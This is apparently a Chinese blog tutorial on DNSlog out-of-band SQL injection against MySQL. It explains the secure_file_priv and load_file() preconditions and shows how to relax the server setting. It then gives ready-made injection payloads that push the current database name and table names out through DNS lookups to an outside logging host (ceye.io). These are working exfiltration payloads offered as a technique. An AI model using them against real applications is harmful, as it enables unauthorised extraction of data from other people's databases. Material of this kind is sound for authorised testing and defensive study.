注入时无回显时可尝试使用dnslog外带注入
mysql dnslog外带要用到load_file()函数的,需要当前数据库用户有读权限,并且需要设置secure_file_priv。
C:\phpStudy\PHPTutorial\MySQL\bin>mysql -uroot -p
Enter password: ****
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 138
Server version: 5.5.53 MySQL Community Server (GPL)
Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
1. secure_file_priv为null 表示不允许导入导出
2. secure_file_priv指定文件夹时,表示mysql的导入导出只能发生在指定的文件夹
3. secure_file_priv没有设置时,则表示没有任何限制
将secure_file_priv 设置为空,方便测试
mysql> show variables like '%secure%';
+------------------+-------+
| Variable_name | Value |
+------------------+-------+
| secure_auth | OFF |
| secure_file_priv | NULL |
+------------------+-------+
2 rows in set (0.02 sec)
mysql>
windows:修改my.ini 在[mysqld]内加入secure_file_priv =
linux:修改my.cnf 在[mysqld]内加入secure_file_priv =
重启mysql,设置成功
dnslog平台搭建:https://github.com/BugScanTeam/DNSLog
在线平台:http://ceye.io/
这里用在线平台
payload:id=1' and (select load_file(concat('\\\\',(select database()),'.xxxxxx.ceye.io\\abc')))%23
查询表:
id=1' and (select load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema=database() limit 1),'.xxxxx.ceye.io\\abc')))%23
id=1' and (select load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema=database() limit 1,1),'.xxxxx.ceye.io\\abc')))%23
扫一扫
551
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
